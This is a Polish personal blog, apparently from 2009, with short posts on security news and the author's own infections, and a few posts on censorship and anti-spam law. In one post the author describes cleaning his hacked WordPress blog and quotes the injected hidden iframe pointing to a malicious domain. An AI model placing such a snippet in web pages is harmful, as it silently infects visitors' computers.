markasblog

Specjaliści z firmy Secunia opublikowali wczoraj informację o wykryciu krytycznej luki w Firefoksie 3.5. Luka dotyczy sposobu, w jaki przeglądarka przetwarza kod JavaScript. Sposób ten pozwala na nadpisanie pamięci z użyciem odpowiedniego znacznika HTML, a co za tym idzie, wykonania zdalnie złośliwego kodu, który pozwoli na przejęcie kontroli nad systemem. Na tą chwilę, aby złośliwy kod pobrać na komputer, użytkownik musi wejść na odpowiednio spreparowaną stronę internetową.

Do czasu ukazania się odpowiedniej poprawki zaleca się nie wchodzenie na strony internetowe niewiadomego pochodzenia, które wykorzystują JavaScript.

Gigant na rynku wyszukiwarek – Google ma w planach ma dostosowanie się do dyrektyw rządu chińskiego w kwestii dostępności wyników wyszukiwania, gdzie zapytanie miało jakikolwiek związek z pornografią. Po wprowadzeniu zmian, lokalna wyszukiwarka (google.cn) nie będzie zwracała wyników wyszukiwania związanych z pornografią, przez co firma z Mountain View pójdzie na rękę chińskiej agencji China Internet Illegal Information Reporting Center, która oskarżała Google o rozpowszechnianie pornograficznych i wulgarnych treści.

CIIRC został założony 10 czerwca 2004 roku. Jego zadaniem jest:

• utrzymanie porządku w Internecie
• reprezentowanie interesów publicznych
• ochrona ludności, w szczególności osób nieletnich przez treściami wulgarnymi płynącymi z Internetu
• wzmocnienie samoregulacji i samodyscypliny w chińskiej branży internetowej

CIIRC działa pod kierownictwem Ministerstwa Informacji Przemysłu Biura Państwowej Rady Informacji. CIIRC współpracuje z Ministerstwem Bezpieczeństwa Publicznego i wspiera organy służb ścigania, podając namiary na osoby, które są, lub mogą być zamieszane w przestępstwa popełniane za pośrednictwem Internetu.

Organizacja CIIRC zbiera bardzo pochlebne komentarze do swojej działalności. Na stronie agencji można przeczytać, że na skrzynkę pocztową pracownicy CIIRC otrzymali ponad 30000 listów z pochwałami i propozycjami dalszych zmian w prawie, które pozwolą w jeszcze większym stopniu uregulować ruch w Internecie. Szczególne pochwały płyną ze strony szkół i rodziców, którzy dziękują za zmniejszenie dostępności treści pornograficznych i ogólnie uznanych za wulgarne dla swoich pociech.

CIIRC organizuje wiele imprez, na których stara się przekazywać wiedzę z zakresu bezpiecznego korzystania z Internetu. Uczy rodziców jak chronić swoje dzieci przed szkodliwymi informacjami płynącymi z sieci.

Należy zastanowić się, co CIIRC (czyt. chiński rząd) rozumie przez zwrot „szkodliwa informacja”. Czy za taka informację uważa się faktycznie pornografię i inne wulgarne treści, czy jest to raczej próba „cichej” cenzury Internetu i odcięcie młodych ludzi od informacji płynących z zewnątrz. Jeżeli główną przesłanką jest cenzura, to należy cały projekt potępić. Jeżeli natomiast cel jest szczytny (stop pornografii wśród nieletnich) to myślę, że zmuszenie Google do zmian w algorytmie wyszukiwania w lokalnej wyszukiwarce jest godne naśladowania.

Za chwile podniosą się głosy, że mimo wszystko jest to cenzura. Moim zdaniem jednak taki rodzaj cenzury jest porządany i należałoby zwrócić uwagę na ten problem naszego rządu.

Z drugiej strony brak wyników w wyszukiwarce google.cn nic nie da. Wystarczy wpisać w przeglądarkę google.com i zyskujemy pełną funkcjonalność. Chyba, że CIIRC wywalczy blokowanie wszystkich „nie chińskich” przeglądarek. Znając zdolności rządu chińskiego i takiego pomysłu można się spodziewać w niedalekiej przyszłości.

Nikolaos Rangos, znany specjalista ds. bezpieczeństwa zamieścił na stronach Full Disclosure informacje o poważnej luce w zabezpieczeniach w usłudze IIS 6.0. Nikolaos Rangos pokazuje, że przy pomocy odpowiednio spreparowanego zapytania HTTP przesłanego na serwer działający w oparciu o IIS 6.0, można przeglądać pliki umieszczone na serwerze, a nawet dodawać nowe. Rangos ustalił, że najprawdopodobniej błąd znajduje się w module odpowiedzialnym za obsługę tokenów Unicode.

Problem dotyczy wersji 6.0 usługi IIS z aktywnymi protokołami WEBDav, które są wykorzystywane do udostępniania plików online. Istnieje w całej tej historii również i dobra informacja. Nikolaos Rangos nie zdołał przeprowadzić skutecznego ataku na serwery Exchange i SharePoint, które również działają w oparciu o IIS 6.0. Potwierdza to również Thierry Zoller, niezależny konsultant ds. bezpieczeństwa, który po przetestowaniu przez Rangosa luki powiedział:

Istotą luki jest to, że pozwala ona na uzyskanie dostępu do zgromadzonych na serwerze plików z ominięciem obowiązku autoryzowania użytkownika. Co więcej – napastnik może też wgrywać nowe pliki na serwer. Dobra wiadomość jest taka, że na razie nie udało nam się znaleźć żadnego sposobu, który pozwalałby na uruchomienie na takim zaatakowanym serwerze złośliwego kodu.

Zoller wykazał również, że IIS 5 i IIS 7 nie są podatne na tego typu ataki, ale nie wyklucza jednocześnie, że inne usługi działające w oparciu o protokół WEBDav mogą zawierać podobne luki w zabezpieczeniach. Z tego też powodu zalecana jest duża ostrożność, a wręcz zaprzestanie korzystania przez administratorów serwerów z usług WEBDav do czasu wydania przez Microsoft stosownej poprawki.

Microsoft tymczasem nie potwierdza informacji, że istnieje jakiekolwiek niebezpieczeństwo. Gigant z Redmond póki co każe czekać na zajęcie stosownego stanowiska ograniczając się jedynie do lakonicznej informacji.

W dniu wczorajszym wiele osób, które na mojego bloga zaglądają mogły się zdziwić widząc komunikat, że strona została uznana za niebezpieczną i może linkować do niebezpiecznego oprogramowania (czyt. wirusów). Wy się zdziwiliście… A co ja miałem powiedzieć? Pomyślałem sobie, najpierw Windows XP na blaszaku ugiął się pod naporem wirusów, a teraz jeszcze bloga nie chcą mi oszczędzić… WTF?! Ale cóż, stało się… Najprawdopodobniej sam się przyczyniłem do tego, że ktoś wstrzyknął mi na stronę kod, który linkował do jl.chura.pl/rc/ (celowo tutaj nie stworzyłem linka, aby nie kusić do wchodzenia na stronę, bowiem na 100% skończy się to zainfekowaniem systemu).

Jak to się stało, że ktoś był w stanie wstrzyknąć szkodliwy fragment kodu do mojej strony. Myślę, a nawet jestem pewien, że za cały incydent odpowiada Total Commander, z którego korzystałem do wymiany plików pomiędzy serwerem hostującym moją stronę, a twardym dyskiem mojego komputera po protokole FTP. Moim błędem, było stworzenie profilu w Total Commanderze do łączenia się z serwerem FTP cba.pl (to akurat rzecz normalnie stosowana i raczej nie niosąca żadnego niebezpieczeństwa) i zapisanie na stałe w profilu hasła do tegoż serwera (i tutaj powinienem się wstydzić, bo jako doświadczonemu użytkownikowi komputera, takich błędów nie wypada robić). Okazuje się, że nie należy ignorować informacji płynących z portali internetowych zajmujących się bezpieczeństwem sieci. Ja niestety zignorowałem komunikat o poważnej luce w Total Commanderze i doigrałem się – hasła zostały wykradzione.

Na trop fragmentu kodu naprowadził mnie raport z „Narzędzi dla webmasterów” udostępnionych przez Google. W raporcie było wyraźnie zaznaczone, że blog linkuje do domeny chura.pl, która jest uznana za niebezpieczną. Cóż, nie pozostało mi nic innego jak przeszukać zawartość plików WordPressa pod kątem zawartości tekstu z ciągiem znaków chura.pl.

Pomocnym narzędziem okazało się rozszerzenie do Firefoksa o nazwie Firebug. Jest to narzędzie, które pozwala przede wszystkim na podgląd kodu strony aktualnie wyświetlanej w przeglądarce internetowej. Skorzystałem z narzędzia wyszukiwania tekstu (wbudowane w Firebuga) i znalazłem. Znalazłem kod, który wyglądał jak poniżej:

<iframe src=”http://jL.chura.pl/rc/” style=”display:none”></iframe>

Jak już zlokalizowałem konkretny fragment kodu za pomocą Firebuga, nie było problemu z usunięciem wstrzykniętego kodu z plików WordPressa. Po dokładnym przeanalizowaniu całości kodu i upewnieniu się, że już nic więcej niepowołanego w nim nie siedzi, zgłosiłem do Google ponowną prośbę o przeanalizowanie strony pod kątem bezpieczeństwa dla odwiedzających. O godzinie 6:00 w poniedziałek (19.06.2009) blog wrócił do sieci już nie obarczony komunikatem o potencjalnym niebezpieczeństwie.

Ja sam pozmieniałem hasła dostępu do wszystkich serweró, które współtworzą infrastrukturę, na której jest mój blog oparty (FTP, MySQL) i oczywiście wykasowałem (i już nie będę zapisywał) z profilów Total Commandera wszelkie hasła. Pragnę również zapewnić wszystkich, że dołożę wszelkich starań, aby odwiedzanie mojego bloga było bezpieczne i nie groziło złapaniem jakiegoś świństwa.

Pomimo, że programiści Mozilli powoli zbliżają się do końca prac nad Firefoksem w wersji 3.5, nie zapominają o wersji 3.0. w ostatni piątek ukazała się kolejna wersja przeglądarki z gałęzi 3.0 oznaczona jako 3.0.11. W nowej wersji przeglądarki poprawiono kilka błędów związanych z bezpieczeństwem, z czego cztery były oznaczone jako krytyczne (więcej szczegółów można zobaczyć tutaj). Popracowano również nad stabilnością programu, a także zaktualizowano wewnętrzną bazę danych SQLite do najnowszej wersji, dzięki czemu rozwiązano kilka problemów zgłaszanych przez społeczność. Wyeliminowano również błąd, który w pewnych okolicznościach mógł doprowadzić do uszkodzenia bazy danych zakładek.

Pełną listę poprawionych błędów można zobaczyć tutaj.

Oczywiście zalecam jak najszybszą aktualizację przeglądarki do najnowszej wersji. Wersję instalacyjną dla systemu Windows przeglądarki można pobrać stąd. Dla systemów innych niż Windows pliki instalacyjne przeglądarki można pobrać z oficjalnej strony Mozilli.

I stało się. Położyłem Windowsa XP zainstalowanego na komputerze stacjonarnym. Wielu powie, że nic w tym dziwnego, bo przecież WIN XP to szmelc jakich mało, ale jeżeli powiem, że system działał u mnie ponad 3 lata bez instalacji, to wydaje mi się, że wielu przyzna, że jest to wyczyn. Wspomnę również, że system przed awarią działał z szybkością porównywalną do tej zaraz po instalacji, więc mam czego żałować. Jak tego dokonałem, że system działał u mnie tak długo, nie jest tematem tego artykułu, więc nie będę tutaj go poruszał.

Co się stało?

Jak zwykle w takich sytuacjach, zawinił czynnik ludzki. System był dobrze zabezpieczony – Avast Home Edition (do tej pory mnie nie zawiódł), ZoneAlarm Firewall (do tej pory żadnych problemów) i do tego okresowe skanowania SpyBotem i Ad-Awarem na nic się zdają, gdy użytkownik ignoruje komunikaty antywirusa i instaluje coś, czego pochodzenie nie jest tak do końca znane. I ja właśnie tak postąpiłem. Ściągnąłem ze strony thekeys.ws (przestrzegam przed tą stroną; myślę, że większość generatorów kluczy dostępnych na stronie jest zawirusowanych) generatora kluczy (plik *.exe) do gry i… No właśnie – dalej zachowałem się jak idiota i analfabeta komputerowy. Kliknąłem na ściągnięty plik dwukrotnie w celu uruchomienia generatora. Antywirus zaczął „wyć” o potencjalnym niebezpieczeństwie (nawet podajł nazwę wykrytego wirusa), a ja zignorowałem te informacje i zainstalowałem program na dysku komputera. I od tej pory zaczęła się masakra. Avast po pewnym czasie, zaczął wariować – ilość wirusów, jaką wykrył mi na przestrzeni jednej godziny, przekroczyła ilość szkodliwego oprogramowania jaka została wykryta na przestrzeni ostatnich 3 lat.

Na pierwszy ogień poszedł katalog: c:\Documents and Settings\Nazwa użytkownika\Ustawienia lokalne\Temporary Internet Files\Content.IE5\

Następnie wirusy zaczęły się ujawniać w katalogu: c:\WINDOWS\system32\

Próba instalacji innego antywirusa kończyła się niepowodzeniem. Pomyślałem, że może Avira AntiVir Personal poradzi sobie z problemem, ale niestety po rozpakowaniu przez program instalacyjny plików do folderu tymczasowego, pojawiał się komunikat o nieistniejącym pliku setup.exe, a dam sobie głowę uciąć, że plik był, bowiem sprawdzałem to.

Pomyślałem, że może skoro antywirusy zainstalowane na dysku nic nie pomogą, to może skanery online w jakiś sposób pomogą. W pierwszej kolejności do walki z nieprzyjacielem poszedł skaner MKS. Niestety Internet Explorer 8 poległ w przedbiegach,nie mogąc połączyć się ze stroną internetową skanera (wcześniej takich problemów nie miałem). Jeżeli nie MKS, to może TredMicro i Firefox (później Opera). Tutaj też niestety nieprzyjaciel okazał się bardziej przebiegły.

Wojna zakończyła się restartem systemu, po którym system nie podniósł się już z kolan. Wręcz przeciwnie – położył się na plecach i powiedział: „I will back”.

Oczywiście system wróci, jeżeli tylko znajdę czas i postawie go na nogi.

Cieszy jedynie fakt, że system miałem postawiony na osobnej partycji, więc ewentualna utrata cennych danych nie wchodzi w grę. No chyba, że ustawienia Firefoksa i AQQ, ale to w sumie nie problem, ponieważ zawsze pod koniec dnia robię kopię zapasową tych ustawień.

Szczerze powiem, że nawet nie jestem zły na siebie. Gdy system nie chciał się już uruchomić po restarcie, pomyślałem: „Wreszcie, bo trzy lata to już za długo nawet jak na system, o którym sam dbam”. Zresztą jak widać, od świata nie jestem odcięty. W rezerwie mam zawsze laptopa, który jest moim wiernym kompanem podczas każdej podróży, więc i teraz się przyda

Powołując się na raport firmy Trustwave można powiedzieć, że mieszkańcy Europy Wschodniej nie mogą spać spokojnie, gdy mówimy o bezpieczeństwie ich pieniędzy, do których dostęp mają za pośrednictwem bankomatów. Otóż firma informuje, że na bankomatach pracujących na systemie Windows XP zostało wykryte szkodliwe oprogramowanie, które praktycznie umożliwia przejęcie całkowitej kontroli nad maszyną. Problem ten dotyczy w szczególności Ukrainy i Rosji. Podejrzane w całym procederze są w szczególności osoby bezpośrednio związane z bankami, bądź z obsługą bankomatów bowiem, nie istnieje możliwość zdalnego zainfekowania systemów operacyjnych, pod których kontrolą działają bankomaty.

Za pośrednictwem szkodliwego oprogramowania, które zostało napisane w języku Delphi, przestępcy w pierwszej kolejności podmieniali narzędzie administracyjne systemu (isadmin.exe), a następnie preparowali program lsass.exe, co umożliwiało całkowite przejęcie kontroli nad systemem.

Od chwili infekcji, szkodliwe oprogramowanie pobierało dane z kart bankomatowych i zapisywał je na dysku. Trojan udostępniał również dosyć rozbudowany interfejs graficzny, który był dostępny po włożeniu odpowiednio spreparowanej karty. Za pośrednictwem interfejsu można było uzyskać dostęp do takich funkcji jak: całkowite odinstalowanie trojana z systemu, wydrukowanie danych zgromadzonych na dysku na drukarce podłączonej do bankomatu, aż po wypłatę wszystkich pieniędzy z bankomatu.

Więcej o zagrożeniu można przeczytać w raporcie opublikowanym przez Trustwave.

Jak widać problem cyberprzestępstwa staje się coraz bardziej poważny. Cyberprzestępcy wchodzą nie tylko za cel obrali sobie nasze domowe komputery, ale co gorsza, coraz bardziej zuchwale postępują sobie z systemami, które są odpowiedzialne za ochronę naszych danych i pieniędzy. Zastanawia mnie fakt, czy zachodnia i środkowa część Europy kładzie większy nacisk na zabezpieczenia systemów bankomatowych i bankowych w ogóle. Nie chciałbym, aby kolejny raport firmy Trustwave, który będzie dotyczył tego samego problemu, ale będzie się skupiał na naszej części Europy, wypadnie tak samo blado.

Słów kilka o LSASS

W trakcie czytania tego artykułu wpadliście na proces o nazwie lsass.exe. Czy jest i do czego służy LSASS?

LSASS (Local Security Authority Subsystem Service) jest usługą udostępniającą interfejs do zarządzania lokalnymi zabezpieczeniami, uwierzytelnianiem domen oraz procesami usługi Active Directory. Usługa LSASS obsługuje uwierzytelnianie dla klienta i dla serwera. Zawiera także funkcje, które służą do obsługi narzędzi usługi Active Directory.

Proces Lsass.exe odpowiada m.in. za działanie następujących składników:

• Urząd zabezpieczeń lokalnych
• Usługa Logowanie do sieci
• Usługa Menedżer kont zabezpieczeń
• Usługa Serwer LSA
• Protokół SSL (Secure Sockets Layer)
• Protokół uwierzytelniania Kerberos v5
• Protokół uwierzytelniania NTLM

Windows XP i bankomat? Czemu nie…

Windows XP działający na bankomatach nie jest tym samym systemem, który większość domowych użytkowników ma zainstalowany na swoich komputerach. Microsoft równolegle z wersjami desktopowymi stworzył specjalną odmianę systemu Windows XP, którą nazywamy Windows XP Embedded. Przeznaczeniem tego systemu są kasy sklepowe, automatyka przemysłowa, bankomaty oraz wiele innych urządzeń specjalizowanych.

Jedyną rzeczą wspólną obu wersji – desktopowej i embedded – jest jądro systemu. I praktycznie na tym podobieństwa się kończą. Xp Embedded charakteryzuje się dużą modularnością, dzięki czemu łatwiej jest ten system przystosować do konkretnych platform sprzętowych. Położony jest również dużo większy nacisk na pracę w sieci.

Microsoft udostępnił zestaw dedykowanych narzędzi, które umożliwiają skonfigurowanie systemu z dokładnością do pojedynczej funkcji jak będzie wykorzystywana w kontrolowanym przez system urządzeniu.

Kilka dni temu pisałem o zmianach w prawie telekomunikacyjnym, które miały za zadanie walczyć z plagą spamu, krążącego w globalnej sieci komputerowej. Wspomniałem również o wysokich karach jakie może nałożyć urząd na spamerów. Należy się jednak w tym miejscu małe sprostowanie do całej sytuacji. Jak podaje serwis idg.pl, kary nie będą nakładane na nieświadomych użytkowników, których maszyny zostały zarażone szkodliwym oprogramowaniem, dzięki któremu rozsyłany jest spam. Cytując za Mikołajem Karpińskim – dyrektorem Biura Informacji i Promocji w Ministerstwie Infrastruktury, sprawa ma się następująco:

Projekt nie zawiera regulacji, które skutkowałyby ograniczeniem możliwości korzystania z usług czy też nałożeniem kary pieniężnej dla abonentów nieświadomych nieuprawnionego wykorzystania ich urządzeń końcowych do przesyłania spamu.

Karpiński podkreśla również, że Ministerstwo Infrastruktury zdaje sobie sprawę ze skali zjawiska jakim są botnety, jak i komputery zombie i stąd też uważa, że niewłaściwym by było uderzanie karami w końcowych użytkowników, którzy są najczęściej nieświadomi, że ich komputery są zarażone i rozsyłają spam. Założenia nowelizacji są następujące:

• każdy dostawca usług internetowych będzie miał do dyspozycji odpowiednie narzędzia, za pomocą których będzie mógł chronić własną sieć telekomunikacyjną przed spamerami. Będzie również zobligowany do przyjmowania wszelkich informacji o nieprawidłowościach występujących w jego sieci telekomunikacyjnej.
• indywidualni odbiorcy usług internetowych będą zobligowani do lepszego zabezpieczenia swoich komputerów (antywirusy itp.)
• punkty przyjmowania zgłoszeń nieprawidłowości (spam-boxy) będą wzajemnie ze sobą współpracowały, co powinno przyczynić się do bardziej skoordynowanego działania wymierzonego przeciw spamerom.
• Prezes Urzędu Komunikacji Elektronicznej będzie odpowiedzialny za prowadzenie postępowań karnych i nakładanie kar pieniężnych oraz współpracę z instytucjami międzynarodowymi w kwestii zwalczania zjawiska spamu.

Jak to będzie wyglądać w praktyce?

Dostawca internetu w chwili, gdy zidentyfikuje źródło spamu na komputerze użytkownika, będzie zobligowany do poinformowania go o tym fakcie oraz dostarczenia takiemu użytkownikowi darmowych narzędzi, które będą pomocne w rozwiązaniu problemu. Ustawa zakłada również, że dostawca będzie musiał udzielić nieodpłatnej pomocy w sytuacji, gdy użytkownik nie będzie w stanie sam sobie poradzić z problemem. Dopiero, gdy w wyznaczonym terminie od wykrycia nieprawidłowości użytkownik nie podejmie żadnych działań w kierunku rozwiązania problemu, dostawca może ograniczyć dostęp do usługi (np. poprzez ograniczenie przepustowości łącza).

Już teraz na rynku działają dostawcy usług telekomunikacyjnych, którzy działają w myśl nie istniejącej jeszcze zmiany w prawie telekomunikacyjnym. Takie praktyki stosuje na przykład duży dostawca usług telekomunikacyjnych w Łodzi. Wiem, bo sam stałem się – podkreślam, że zupełnie nieświadomie – częścią botnetu, który rozsyła spam, a dostawca ponformował mnie o tym fakcie oraz pomógł rozwiązać problem.

Firma Symantec opublikowała w ostatnim czasie raport o zagrożeniach bezpieczeństwa pochodzących z Internetu. Specjaliści na łamach raportu informują o znacznym wzroście aktywności cyberprzestępców w roku 2008 i wróżą, że w kolejnych latach tendencja ta się utrzyma. Z raportu Symanteca można się dowiedzieć, że specjaliści tej firmy w roku 2008 utworzyli ponad 1,6 miliona sygnatur szkodliwego kodu, co stanowi około 60% wszystkich sygnatur wytworzonych przez firmę Symantec. Niepokojący jest fakt, iż celem ataków były przede wszystkim poufne dane zwykłych użytkowników Internetu.

Większość komputerów zostało zainfekowanych podczas surfowania po sieci. Cyberprzestępcy stosują coraz bardziej wyrafinowane techniki wykradania danych z naszych komputerów, a prym wiodło (ponad 76% ataków w okresie testów) złośliwe oprogramowanie zapisujące sekwencje znaków wprowadzanych z klawiatury.

Zapewne pamiętacie raport firmy Kaspersky Lab, o którym zamieściłem dosyć obszerny artykuł. Obie firmy podają podobne przyczyny tak dużego wzrostu aktywności cyberprzestępców. Zarówno Kaspersky Lab jak i Symantec jako główną przyczynę ofensywy złośliwego oprogramowania wskazują utrzymujące się zapotrzebowanie na tego typu działalność. Jeżeli dodamy do tego ogromne zyski finansowe czerpane np.: z kradzieży poufnych danych, można mówić o prawdziwym czarnorynkowym procederze, z którym walczy się coraz trudniej.

Jak widzimy pojęcie globalnej wioski zbudowanej w oparciu o ogólnie dostępną sieć komputerową ma plusy i minusy. Najczęstszymi ofiarami ataków cyberprzestępców stają się osoby nieświadome niebezpieczeństwa i często nie zabezpieczające swoich danych w sposób odpowiedni. Rosnąca liczba komputerów zombi, a co za tym idzie, powiększająca się sieć botnetów powoduje, że cyberprzestępcy mają coraz większe pole do popisu.

Pocieszający jest fakt, iż rządy wielu krajów zaczynają czynnie walczyć z wieloma odmianami cyberprzestępstwa. W Polsce na ścieżkę legislacyjną wchodzą zmiany w prawie telekomunikacyjnym mające na celu sprawniejsze i przede wszystkim dotkliwsze karanie spamerów (pisałem o tym projekcie wczoraj).

Niestety wciąż mam wrażenie, że cyberprzestępcy są o krok przed nami i nic nie zapowiada, aby fakt ten miał ulec zmianie. Mało to pocieszające.

Ministerstwo Infrastruktury od lat zamierza rozpocząć walkę z niechcianą pocztą email, która każdego dnia zalewa nasze skrzynki pocztowe. Do tej pory efektów tej walki nie widać, bowiem Polska zajmuje niechlubną 6. pozycję na świecie wśród „producentów” spamu. Teraz ma się jednak wszystko zmienić. Na ścieżkę legislacyjną wchodzą bowiem pewne zmiany w prawie telekomunikacyjnym, które zakładają nakładanie wysokich kar finansowych na spamerów.

Ważnym szczegółem w całej sprawie jest fakt, iż nie tylko korporacje rozsyłające spam będą mogły być karane. Nowe prawo może również uderzyć w zwykłego użytkownika, bowiem większość światowego spamu jest rozsyłane przez zainfekowane komputery domowe (tzw. zombi). Oczywiście nie od razu użytkownik domowy zostanie ukarany stosowną karą finansową (według projektu kary mają wynosić od 100 zł do nawet 100 tyś. zł). W pierwszej kolejności użytkownik podłączony do Internetu, będzie informowany przez operatora, że jego maszyna rozsyła spam. Dopiero gdy ostrzeżenia zostaną zignorowane, na użytkownika może zostać nałożona kara.

Pewnym ograniczeniom będą również podlegać również przekazy niekomercyjne (polityczne, religijne), co może spowodować, że na przykład kampanie wyborcze prowadzone za pośrednictwem Internetu mogą już nie przybierać tak na sile jak miało to miejsce w latach wcześniejszych. Zapis ten wzbudził wśród internautów wiele kontrowersji. Dla wielu z nich może to oznaczać wprowadzenie cenzury niejako tylnymi drzwiami. Miejmy nadzieję, że intencje władzy ustawodawczej są jak najbardziej czyste w tej kwestii.

Projekt zakłada nie tylko nakładanie kar finansowych na spamerów. W jego ramach powstanie również komórka spam-box, do której będzie można zgłaszać przypadki spamu.

Nowe prawo telekomunikacyjne ma zacząć funkcjonować od przyszłego roku. Miejmy nadzieję, że spam-box przynajmniej po części wyeliminuje spam z naszych kont pocztowych. Należy jednak pamiętać, że polscy spamerzy nie generują największego ruchu w sieci, a są jedynie kroplą w całości, a niestety nowe prawo telekomunikacyjne w żaden sposób nie będzie mogło uderzyć w spamerów spoza granic naszego kraju.

Inną sprawą jest fakt, że zakładając konta pocztowe na darmowych serwerach, sami niejako godzimy się na otrzymywanie setek niechcianych maili, ponieważ jest to praktycznie jedyny warunek darmowości takiego konta i z tym raczej sobie nie poradzimy, bo przecież nie każdego stać na płatne konto, które jest wolne od reklam (w sumie i w to nie wierze).